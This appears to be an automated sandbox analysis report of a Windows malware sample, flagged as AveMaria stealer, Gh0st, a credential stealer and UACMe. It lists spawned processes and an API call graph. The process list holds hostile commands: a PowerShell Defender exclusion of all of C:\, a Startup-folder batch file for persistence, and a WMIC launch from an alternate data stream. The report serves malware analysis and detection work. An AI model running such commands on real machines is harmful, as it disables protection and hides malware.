• Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 24%, ReversingLabs
Reputation: low

                                                                  Target ID:6
                                                                  Start time:12:33:22
                                                                  Start date:22/05/2022
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:powershell Add-MpPreference -ExclusionPath C:\
                                                                  Imagebase:0x1c0000
                                                                  File size:430592 bytes
                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Reputation:high

                                                                  Target ID:7
                                                                  Start time:12:33:24
                                                                  Start date:22/05/2022
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat" "
                                                                  Imagebase:0x7ff737520000
                                                                  File size:273920 bytes
                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Target ID:8
                                                                  Start time:12:33:25
                                                                  Start date:22/05/2022
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\System32\cmd.exe
                                                                  Imagebase:0xc20000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Target ID:9
                                                                  Start time:12:33:25
                                                                  Start date:22/05/2022
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7c9170000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Target ID:10
                                                                  Start time:12:33:25
                                                                  Start date:22/05/2022
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7c9170000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Target ID:12
                                                                  Start time:12:33:26
                                                                  Start date:22/05/2022
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7c9170000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Target ID:13
                                                                  Start time:12:33:26
                                                                  Start date:22/05/2022
                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:wmic process call create '"C:\ProgramData:ApplicationData"'
                                                                  Imagebase:0x7ff7431c0000
                                                                  File size:521728 bytes
                                                                  MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate

                                                                  Target ID:22
                                                                  Start time:12:33:44
                                                                  Start date:22/05/2022
                                                                  Path:C:\Windows\System32\drivers\rdpvideominiport.sys
                                                                  Wow64 process (32bit):
                                                                  Commandline:
                                                                  Imagebase:
                                                                  File size:30616 bytes
                                                                  MD5 hash:0600DF60EF88FD10663EC84709E5E245
                                                                  Has elevated privileges:
                                                                  Has administrator privileges:
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate

                                                                  Target ID:23
                                                                  Start time:12:33:44
                                                                  Start date:22/05/2022
                                                                  Path:C:\Windows\System32\drivers\rdpdr.sys
                                                                  Wow64 process (32bit):
                                                                  Commandline:
                                                                  Imagebase:
                                                                  File size:182784 bytes
                                                                  MD5 hash:52A6CC99F5934CFAE88353C47B6193E7
                                                                  Has elevated privileges:
                                                                  Has administrator privileges:
                                                                  Programmed in:C, C++ or other language

                                                                  Target ID:27
                                                                  Start time:12:33:45
                                                                  Start date:22/05/2022
                                                                  Path:C:\Windows\System32\drivers\tsusbhub.sys
                                                                  Wow64 process (32bit):
                                                                  Commandline:
                                                                  Imagebase:
                                                                  File size:126464 bytes
                                                                  MD5 hash:3A84A09CBC42148A0C7D00B3E82517F1
                                                                  Has elevated privileges:
                                                                  Has administrator privileges:
                                                                  Programmed in:C, C++ or other language

                                                                  Target ID:30
                                                                  Start time:12:34:06
                                                                  Start date:22/05/2022
                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                  Imagebase:0x7ff674600000
                                                                  File size:488448 bytes
                                                                  MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language

                                                                  Target ID:41
                                                                  Start time:12:35:04
                                                                  Start date:22/05/2022
                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                  Imagebase:0x7ff674600000
                                                                  File size:488448 bytes
                                                                  MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language


                                                                    Execution Graph

                                                                    Execution Coverage:5.9%
                                                                    Dynamic/Decrypted Code Coverage:61.1%
                                                                    Signature Coverage:2.3%
                                                                    Total number of Nodes:1852
                                                                    Total number of Limit Nodes:22
                                                                    execution_graph
20114->20002 20116 40dd7a 20114->20116 20115->20114 20117 40ddb8 20116->20117 20121 40dd88 _unexpected 20116->20121 20119 40aa25 __dosmaperr 15 API calls 20117->20119 20118 40dda3 RtlAllocateHeap 20120 40ddb6 20118->20120 20118->20121 20119->20120 20120->20005 20123 410572 20120->20123 20121->20117 20121->20118 20122 40d2b3 _unexpected 2 API calls 20121->20122 20122->20121 20124 4100fd 36 API calls 20123->20124 20125 410591 20124->20125 20126 4105e1 GetACP 20125->20126 20127 4105ef IsValidCodePage 20125->20127 20129 41059b CatchGuardHandler 20125->20129 20131 410614 __cftof 20125->20131 20126->20127 20126->20129 20128 410601 GetCPInfo 20127->20128 20127->20129 20128->20129 20128->20131 20129->20008 20187 4101d5 GetCPInfo 20131->20187 20133 410005 __FrameHandler3::FrameUnwindToState 20132->20133 20256 40faaa RtlEnterCriticalSection 20133->20256 20135 41000f 20257 41003c 20135->20257 20139 410028 __FrameHandler3::FrameUnwindToState 20139->20005 20140->20105 20144 40faf2 RtlLeaveCriticalSection 20141->20144 20143 41050d 20143->20105 20144->20143 20146 40b1dd 20145->20146 20147 40b1d3 20145->20147 20146->20147 20148 40da9c _unexpected 34 API calls 20146->20148 20147->20112 20147->20113 20149 40b1fe 20148->20149 20153 40ecab 20149->20153 20154 40b217 20153->20154 20155 40ecbe 20153->20155 20157 40ecd8 20154->20157 20155->20154 20161 4118b6 20155->20161 20158 40ed00 20157->20158 20159 40eceb 20157->20159 20158->20147 20159->20158 20182 41055f 20159->20182 20162 4118c2 __FrameHandler3::FrameUnwindToState 20161->20162 20163 40da9c _unexpected 34 API calls 20162->20163 20164 4118cb 20163->20164 20165 411919 __FrameHandler3::FrameUnwindToState 20164->20165 20173 40faaa RtlEnterCriticalSection 20164->20173 20165->20154 20167 4118e9 20174 41192d 20167->20174 20172 40d3a8 __FrameHandler3::FrameUnwindToState 34 API calls 20172->20165 20173->20167 20175 4118fd 20174->20175 20176 41193b _unexpected 20174->20176 20178 41191c 20175->20178 20176->20175 20177 411669 _unexpected 15 API 
calls 20176->20177 20177->20175 20181 40faf2 RtlLeaveCriticalSection 20178->20181 20180 411910 20180->20165 20180->20172 20181->20180 20183 40da9c _unexpected 34 API calls 20182->20183 20184 410569 20183->20184 20185 410484 __cftof 34 API calls 20184->20185 20186 41056f 20185->20186 20186->20158 20189 4102b9 CatchGuardHandler 20187->20189 20192 41020f 20187->20192 20189->20129 20190 410270 20207 41232f 20190->20207 20195 4114c8 20192->20195 20194 41232f 39 API calls 20194->20189 20196 40b1c0 __cftof 34 API calls 20195->20196 20197 4114e8 MultiByteToWideChar 20196->20197 20199 411521 20197->20199 20203 4115a5 CatchGuardHandler 20197->20203 20200 40dd7a 16 API calls 20199->20200 20204 411539 __cftof __alloca_probe_16 20199->20204 20200->20204 20201 41159f 20212 4115cc 20201->20212 20203->20190 20204->20201 20205 411575 MultiByteToWideChar 20204->20205 20205->20201 20206 41158f GetStringTypeW 20205->20206 20206->20201 20208 40b1c0 __cftof 34 API calls 20207->20208 20209 412342 20208->20209 20216 412149 20209->20216 20211 410291 20211->20194 20213 4115d8 20212->20213 20214 4115e9 20212->20214 20213->20214 20215 40dd40 _free 15 API calls 20213->20215 20214->20203 20215->20214 20218 412164 20216->20218 20217 41218a MultiByteToWideChar 20219 4121b6 20217->20219 20220 412307 CatchGuardHandler 20217->20220 20218->20217 20223 40dd7a 16 API calls 20219->20223 20227 4121cb __alloca_probe_16 20219->20227 20220->20211 20221 412203 MultiByteToWideChar 20222 41226e 20221->20222 20224 41221a 20221->20224 20226 4115cc __freea 15 API calls 20222->20226 20223->20227 20241 40e202 20224->20241 20226->20220 20227->20221 20227->20222 20228 412231 20228->20222 20229 412245 20228->20229 20230 41227d 20228->20230 20229->20222 20232 40e202 6 API calls 20229->20232 20231 40dd7a 16 API calls 20230->20231 20235 41228f __alloca_probe_16 20230->20235 20231->20235 20232->20222 20233 4122f8 20234 4115cc __freea 15 API calls 20233->20234 20234->20222 20235->20233 20236 40e202 6 API calls 20235->20236 
20237 4122d7 20236->20237 20237->20233 20238 4122e6 WideCharToMultiByte 20237->20238 20238->20233 20239 412326 20238->20239 20240 4115cc __freea 15 API calls 20239->20240 20240->20222 20247 40de6f 20241->20247 20244 40e21e CatchGuardHandler 20244->20228 20246 40e25e LCMapStringW 20246->20244 20248 40df6b _unexpected 5 API calls 20247->20248 20249 40de85 20248->20249 20249->20244 20250 40e276 20249->20250 20253 40de89 20250->20253 20252 40e28c CatchGuardHandler 20252->20246 20254 40df6b _unexpected 5 API calls 20253->20254 20255 40de9f 20254->20255 20255->20252 20256->20135 20267 41076c 20257->20267 20259 41005e 20260 41076c 21 API calls 20259->20260 20261 41007d 20260->20261 20262 40dd40 _free 15 API calls 20261->20262 20263 41001c 20261->20263 20262->20263 20264 410030 20263->20264 20281 40faf2 RtlLeaveCriticalSection 20264->20281 20266 41003a 20266->20139 20268 41077d 20267->20268 20277 410779 __InternalCxxFrameHandler 20267->20277 20269 410784 20268->20269 20272 410797 __cftof 20268->20272 20270 40aa25 __dosmaperr 15 API calls 20269->20270 20271 410789 20270->20271 20273 40a968 __cftof 21 API calls 20271->20273 20274 4107c5 20272->20274 20275 4107ce 20272->20275 20272->20277 20273->20277 20276 40aa25 __dosmaperr 15 API calls 20274->20276 20275->20277 20279 40aa25 __dosmaperr 15 API calls 20275->20279 20278 4107ca 20276->20278 20277->20259 20280 40a968 __cftof 21 API calls 20278->20280 20279->20278 20280->20277 20281->20266 20283 40b1c0 __cftof 34 API calls 20282->20283 20284 410801 20283->20284 20284->19760 20288 4053a0 VirtualAlloc VirtualProtect 20285->20288 20287 406743 20289 405458 20288->20289 20290 405480 MessageBoxA 20289->20290 20291 40549a 20289->20291 20290->20289 20290->20290 20292 4054a0 MessageBoxA MessageBoxA 20291->20292 20292->20292 20293 4054db 20292->20293 20294 405500 Sleep 20293->20294 20294->20294 20548->19823 20549 4073a7 20560 4073ce InitializeCriticalSectionAndSpinCount GetModuleHandleW 20549->20560 20551 4073ac 20571 407808 20551->20571 
20553 4073b3 20554 4073c6 20553->20554 20555 4073b8 20553->20555 20557 407dbf 4 API calls 20554->20557 20577 407995 20555->20577 20559 4073cd 20557->20559 20561 4073f1 GetModuleHandleW 20560->20561 20562 407402 GetProcAddress GetProcAddress 20560->20562 20561->20562 20565 407448 20561->20565 20563 407420 20562->20563 20564 407432 CreateEventW 20562->20564 20563->20564 20566 407424 20563->20566 20564->20565 20564->20566 20567 407dbf 4 API calls 20565->20567 20566->20551 20568 40744f RtlDeleteCriticalSection 20567->20568 20569 407464 CloseHandle 20568->20569 20570 40746b 20568->20570 20569->20570 20570->20551 20572 407814 20571->20572 20573 407818 20571->20573 20572->20553 20574 407dbf 4 API calls 20573->20574 20576 407825 ___scrt_release_startup_lock 20573->20576 20575 40788e 20574->20575 20576->20553 20580 407968 20577->20580 20581 407977 20580->20581 20582 40797e 20580->20582 20586 40cd9f 20581->20586 20589 40ce21 20582->20589 20585 4073c2 20587 40ce21 24 API calls 20586->20587 20588 40cdb1 20587->20588 20588->20585 20592 40cae9 20589->20592 20591 40ce52 20591->20585 20593 40caf5 __FrameHandler3::FrameUnwindToState 20592->20593 20600 40faaa RtlEnterCriticalSection 20593->20600 20595 40cb03 20601 40cb3a 20595->20601 20597 40cb10 20611 40cb2e 20597->20611 20599 40cb21 __FrameHandler3::FrameUnwindToState 20599->20591 20600->20595 20602 40cb50 _unexpected 20601->20602 20603 40cb58 20601->20603 20602->20597 20603->20602 20610 40cbb1 20603->20610 20614 40aa6b 20603->20614 20605 40aa6b 24 API calls 20606 40cbc7 20605->20606 20608 40dd40 _free 15 API calls 20606->20608 20607 40cba7 20609 40dd40 _free 15 API calls 20607->20609 20608->20602 20609->20610 20610->20602 20610->20605 20643 40faf2 RtlLeaveCriticalSection 20611->20643 20613 40cb38 20613->20599 20615 40aa76 20614->20615 20616 40aa9e 20615->20616 20617 40aa8f 20615->20617 20618 40aaad 20616->20618 20623 40ddc8 20616->20623 20619 40aa25 __dosmaperr 15 API calls 20617->20619 20631 40de06 20618->20631 20622 40aa94 
__cftof 20619->20622 20622->20607 20624 40ddd3 20623->20624 20625 40ddf3 RtlSizeHeap 20624->20625 20626 40ddde 20624->20626 20625->20618 20627 40aa25 __dosmaperr 15 API calls 20626->20627 20628 40dde3 20627->20628 20629 40a968 __cftof 21 API calls 20628->20629 20630 40ddee 20629->20630 20630->20618 20632 40de13 20631->20632 20633 40de1e 20631->20633 20635 40dd7a 16 API calls 20632->20635 20634 40de26 20633->20634 20641 40de2f _unexpected 20633->20641 20636 40dd40 _free 15 API calls 20634->20636 20639 40de1b 20635->20639 20636->20639 20637 40de34 20640 40aa25 __dosmaperr 15 API calls 20637->20640 20638 40de59 RtlReAllocateHeap 20638->20639 20638->20641 20639->20622 20640->20639 20641->20637 20641->20638 20642 40d2b3 _unexpected 2 API calls 20641->20642 20642->20641 20643->20613 20644 2d1d2e9 DeleteCriticalSection 20645 2d1d304 20644->20645 20646 2d1d2fd CloseHandle 20644->20646 20647 2d1d314 20645->20647 20648 2d1d30d CloseHandle 20645->20648 20646->20645 20651 2d15558 WSACleanup 20647->20651 20648->20647 20658 2d20283 ReleaseMutex FindCloseChangeNotification 20651->20658 20653 2d1556c 20659 2d13036 20653->20659 20656 2d13036 2 API calls 20657 2d1557c 20656->20657 20658->20653 20660 2d13044 20659->20660 20661 2d1303f 20659->20661 20660->20656 20663 2d15eee GetProcessHeap RtlFreeHeap 20661->20663 20663->20660 20664 2d23058 20665 2d23073 20664->20665 20666 2d23061 CreateThread 20664->20666 20666->20665 20667 2d15ce2 GetCommandLineA 20666->20667 20668 2d15cf7 GetStartupInfoA 20667->20668 20676 2d15d70 20668->20676 20671 2d15d43 20672 2d15d52 GetModuleHandleA 20671->20672 20679 2d23457 20672->20679 20674 2d15d61 20675 2d15d68 ExitProcess 20674->20675 20735 2d15c8e GetProcessHeap HeapAlloc 20676->20735 20678 2d15d7f 20678->20671 20680 2d2347d 20679->20680 20681 2d23489 GetTickCount 20680->20681 20736 2d110ad 20681->20736 20683 2d23495 GetModuleFileNameA 20737 2d21e21 20683->20737 20685 2d236cf 21032 2d210d7 20685->21032 20687 2d236db 20689 2d15c16 VirtualFree 
GetProcessHeap RtlFreeHeap 20687->20689 20688 2d234bf 20688->20685 20744 2d11085 GetProcessHeap RtlAllocateHeap 20688->20744 20691 2d236e4 20689->20691 20691->20674 20692 2d234e9 20693 2d23505 CreateEventA GetLastError 20692->20693 20693->20685 20694 2d23528 20693->20694 20694->20685 20695 2d23534 RegCreateKeyExA RegSetValueExA RegSetValueExA RegCloseKey 20694->20695 20745 2d15a10 Sleep 20695->20745 20701 2d235c4 20702 2d235d7 SHGetFolderPathW lstrcatW CreateDirectoryW 20701->20702 20703 2d23635 20702->20703 20704 2d23615 20702->20704 20705 2d2364a 20703->20705 20707 2d1fbfc 4 API calls 20703->20707 20872 2d1fbfc GetCurrentProcess OpenProcessToken 20704->20872 20708 2d236ac 20705->20708 20885 2d21136 20705->20885 20715 2d23640 20707->20715 20710 2d236b7 20708->20710 21085 2d21f13 GetCurrentProcess IsWow64Process 20708->21085 21096 2d14e5b 20710->21096 20712 2d2361f 21050 2d1f51d LoadLibraryA 20712->21050 20715->20705 20877 2d22fd7 20715->20877 20718 2d23671 21021 2d1362d 20718->21021 20721 2d236aa 21105 2d14bc0 20721->21105 20724 2d23630 21071 2d21a3c 20724->21071 20725 2d23629 21053 2d21ab9 20725->21053 20733 2d236a3 21084 2d15ea5 VirtualFree 20733->21084 20735->20678 20736->20683 21117 2d11085 GetProcessHeap RtlAllocateHeap 20737->21117 20739 2d21e36 CreateFileA 20740 2d21e5b 20739->20740 20741 2d21e5e GetFileSize ReadFile 20739->20741 20740->20741 20742 2d21e7e FindCloseChangeNotification 20741->20742 20743 2d21e7c 20741->20743 20742->20688 20743->20742 20744->20692 21118 2d2044f 20745->21118 20747 2d15a34 21123 2d20346 20747->21123 20755 2d15a67 21153 2d1304c 20755->21153 20757 2d15a73 21156 2d12e93 20757->21156 20759 2d15a7f 20760 2d13036 2 API calls 20759->20760 20761 2d15a87 20760->20761 21160 2d1595e 20761->21160 20769 2d15ab5 20770 2d21dc0 11 API calls 20769->20770 20771 2d15ad4 20770->20771 20772 2d13437 3 API calls 20771->20772 20773 2d15ae1 20772->20773 21191 2d15ea5 VirtualFree 20773->21191 20775 2d15ae9 20776 2d21dc0 11 API calls 20775->20776 20777 
2d15b08 20776->20777 20778 2d13437 3 API calls 20777->20778 20779 2d15b15 20778->20779 21192 2d15ea5 VirtualFree 20779->21192 20781 2d15b1d 20782 2d21dc0 11 API calls 20781->20782 20783 2d15b3c 20782->20783 20784 2d13437 3 API calls 20783->20784 20785 2d15b49 20784->20785 21193 2d15ea5 VirtualFree 20785->21193 20787 2d15b51 20788 2d21dc0 11 API calls 20787->20788 20789 2d15b97 20788->20789 20790 2d13437 3 API calls 20789->20790 20791 2d15ba4 20790->20791 21194 2d15ea5 VirtualFree 20791->21194 20793 2d15bb4 20794 2d13036 2 API calls 20793->20794 20795 2d15bbc 20794->20795 20796 2d13036 2 API calls 20795->20796 20797 2d15bc4 20796->20797 20798 2d15bd1 20797->20798 21202 2d11e71 20797->21202 20800 2d13036 2 API calls 20798->20800 20801 2d15be4 20800->20801 21195 2d1feed 20801->21195 20804 2d214a6 21307 2d123ca 20804->21307 20807 2d1fbfc 4 API calls 20808 2d214c2 20807->20808 20809 2d135e5 4 API calls 20808->20809 20810 2d214ee 20809->20810 20811 2d13437 3 API calls 20810->20811 20812 2d214f6 20811->20812 21322 2d15ea5 VirtualFree 20812->21322 20814 2d214fe 20815 2d1362d 3 API calls 20814->20815 20816 2d2150a 20815->20816 21323 2d13335 20816->21323 20818 2d21515 21330 2d15ea5 VirtualFree 20818->21330 20820 2d2151d 20821 2d135e5 4 API calls 20820->20821 20822 2d2152a 20821->20822 20823 2d13437 3 API calls 20822->20823 20824 2d21533 20823->20824 21331 2d15ea5 VirtualFree 20824->21331 20826 2d2153b 20827 2d135e5 4 API calls 20826->20827 20828 2d21548 20827->20828 20829 2d13437 3 API calls 20828->20829 20830 2d21551 20829->20830 21332 2d15ea5 VirtualFree 20830->21332 20832 2d21559 20833 2d135e5 4 API calls 20832->20833 20834 2d21566 20833->20834 20835 2d13437 3 API calls 20834->20835 20836 2d2156f 20835->20836 21333 2d15ea5 VirtualFree 20836->21333 20838 2d21577 21334 2d2106c 20838->21334 20841 2d21631 20865 2d14ee7 20841->20865 20842 2d21629 20845 2d13036 2 API calls 20842->20845 20845->20841 20847 2d215ff 20847->20842 21360 2d1f481 20847->21360 20849 2d1304c 2 API calls 
20851 2d215c7 20849->20851 20850 2d13437 3 API calls 20852 2d21621 20850->20852 20853 2d15911 8 API calls 20851->20853 21371 2d15ea5 VirtualFree 20852->21371 20855 2d215d1 20853->20855 20856 2d160aa 4 API calls 20855->20856 20857 2d215d9 20856->20857 21352 2d12ecf 20857->21352 20860 2d13437 3 API calls 20861 2d215ec 20860->20861 21359 2d15ea5 VirtualFree 20861->21359 20863 2d215f4 20864 2d13036 2 API calls 20863->20864 20864->20847 21403 2d158d3 20865->21403 20867 2d14efb 21408 2d11dc8 20867->21408 20873 2d1fc3f 20872->20873 20874 2d1fc1f GetTokenInformation 20872->20874 20875 2d1fc45 FindCloseChangeNotification 20873->20875 20876 2d1fc4e 20873->20876 20874->20873 20875->20876 20876->20703 20876->20712 21427 2d11085 GetProcessHeap RtlAllocateHeap 20877->21427 20879 2d22fe5 21428 2d11085 GetProcessHeap RtlAllocateHeap 20879->21428 20881 2d22fed 20882 2d23001 GetModuleFileNameA 20881->20882 20883 2d23019 20882->20883 20884 2d23048 WinExec 20883->20884 20884->20705 20886 2d1f481 12 API calls 20885->20886 20887 2d2114c 20886->20887 21429 2d134a7 20887->21429 20892 2d20fae RegCloseKey 20893 2d2116e 20892->20893 20983 2d21234 20893->20983 21438 2d1f76b 20893->21438 20894 2d21250 20898 2d21259 SHGetKnownFolderPath 20894->20898 20903 2d213d3 20894->20903 20896 2d2106c 5 API calls 20896->20894 20901 2d135e5 4 API calls 20898->20901 20899 2d21450 20905 2d135e5 4 API calls 20899->20905 20900 2d13437 3 API calls 20906 2d21197 20900->20906 20902 2d21275 20901->20902 20908 2d1346a 9 API calls 20902->20908 20903->20899 20904 2d213ee 20903->20904 20909 2d13437 3 API calls 20903->20909 20910 2d2106c 5 API calls 20904->20910 20911 2d2145b 20905->20911 21443 2d15ea5 VirtualFree 20906->21443 20913 2d21282 20908->20913 20909->20904 20914 2d21403 20910->20914 20915 2d135e5 4 API calls 20911->20915 20912 2d2119f 21444 2d1f71f SHCreateDirectoryExW 20912->21444 20917 2d135e5 4 API calls 20913->20917 20918 2d2148d 20914->20918 20922 2d1362d 3 API calls 20914->20922 20919 2d21468 
20915->20919 20921 2d2128f 20917->20921 21485 2d15ea5 VirtualFree 20918->21485 20923 2d13335 5 API calls 20919->20923 20920 2d211a6 20926 2d1362d 3 API calls 20920->20926 20927 2d1346a 9 API calls 20921->20927 20928 2d21417 20922->20928 20929 2d21471 20923->20929 20925 2d21495 21486 2d15ea5 VirtualFree 20925->21486 20931 2d211b2 20926->20931 20932 2d212a4 20927->20932 21494 2d12fda 20928->21494 21500 2d15ea5 VirtualFree 20929->21500 21445 2d1346a 20931->21445 20937 2d1346a 9 API calls 20932->20937 20935 2d2149d 20935->20708 20935->20718 20941 2d212ab 20937->20941 20939 2d21479 DeleteFileW 21018 2d213a6 20939->21018 20944 2d1346a 9 API calls 20941->20944 20942 2d21039 RegSetValueExW 20945 2d21432 20942->20945 20943 2d13335 5 API calls 20947 2d211c9 20943->20947 20948 2d212b2 20944->20948 21499 2d15ea5 VirtualFree 20945->21499 21452 2d15ea5 VirtualFree 20947->21452 21461 2d13554 20948->21461 20952 2d2143c 20955 2d13036 2 API calls 20952->20955 20953 2d211d1 CopyFileW 20953->20918 20957 2d211e5 20953->20957 20956 2d21444 20955->20956 20956->20918 20959 2d21448 20956->20959 21453 2d13221 20957->21453 20958 2d13554 11 API calls 20961 2d212cc 20958->20961 20962 2d20fae RegCloseKey 20959->20962 20964 2d13261 lstrlenW 20961->20964 20962->20899 20965 2d212d6 20964->20965 21478 2d21d35 CreateFileA 20965->21478 20966 2d15911 8 API calls 20967 2d211fa 20966->20967 20969 2d160aa 4 API calls 20967->20969 20971 2d21202 20969->20971 20973 2d2106c 5 API calls 20971->20973 20975 2d2121b 20973->20975 20974 2d212e8 21482 2d15ea5 VirtualFree 20974->21482 21458 2d21039 20975->21458 20978 2d212f0 20980 2d1f76b 5 API calls 20978->20980 20982 2d212fb 20980->20982 20981 2d13036 2 API calls 20981->20983 20984 2d1346a 9 API calls 20982->20984 20983->20894 20983->20896 20985 2d2130a 20984->20985 20986 2d135e5 4 API calls 20985->20986 20987 2d21317 20986->20987 20988 2d1346a 9 API calls 20987->20988 20989 2d21328 20988->20989 20990 2d1346a 9 API calls 20989->20990 20991 2d2132f 20990->20991 
20992 2d1346a 9 API calls 20991->20992 20993 2d2133c 20992->20993 20994 2d13554 11 API calls 20993->20994 20995 2d21348 20994->20995 20996 2d13554 11 API calls 20995->20996 20997 2d21356 20996->20997 20998 2d13261 lstrlenW 20997->20998 20999 2d21360 20998->20999 21000 2d21d35 3 API calls 20999->21000 21001 2d2136a 21000->21001 21483 2d15ea5 VirtualFree 21001->21483 21003 2d21373 21484 2d15ea5 VirtualFree 21003->21484 21005 2d2137b CopyFileW 21006 2d213b1 21005->21006 21007 2d2138f 21005->21007 21490 2d15ea5 VirtualFree 21006->21490 21487 2d15ea5 VirtualFree 21007->21487 21010 2d21394 21488 2d15ea5 VirtualFree 21010->21488 21011 2d213b6 21491 2d15ea5 VirtualFree 21011->21491 21014 2d2139e 21489 2d15ea5 VirtualFree 21014->21489 21015 2d213c0 21492 2d15ea5 VirtualFree 21015->21492 21501 2d15ea5 VirtualFree 21018->21501 21019 2d213c8 21493 2d15ea5 VirtualFree 21019->21493 21022 2d1365d 21021->21022 21023 2d1363f 21021->21023 21028 2d20bd9 21022->21028 21024 2d13261 lstrlenW 21023->21024 21025 2d13646 21024->21025 21557 2d15eb4 VirtualAlloc 21025->21557 21027 2d13652 lstrcpyW 21027->21022 21029 2d11052 21028->21029 21030 2d20bf1 CreateProcessW 21029->21030 21031 2d20c1e 21030->21031 21083 2d15ea5 VirtualFree 21031->21083 21033 2d210e1 21032->21033 21034 2d210e6 21032->21034 21035 2d20fae RegCloseKey 21033->21035 21558 2d15c16 21034->21558 21035->21034 21051 2d1f54f 21050->21051 21052 2d1f53f GetProcAddress 21050->21052 21051->20724 21051->20725 21052->21051 21054 2d1fbfc 4 API calls 21053->21054 21055 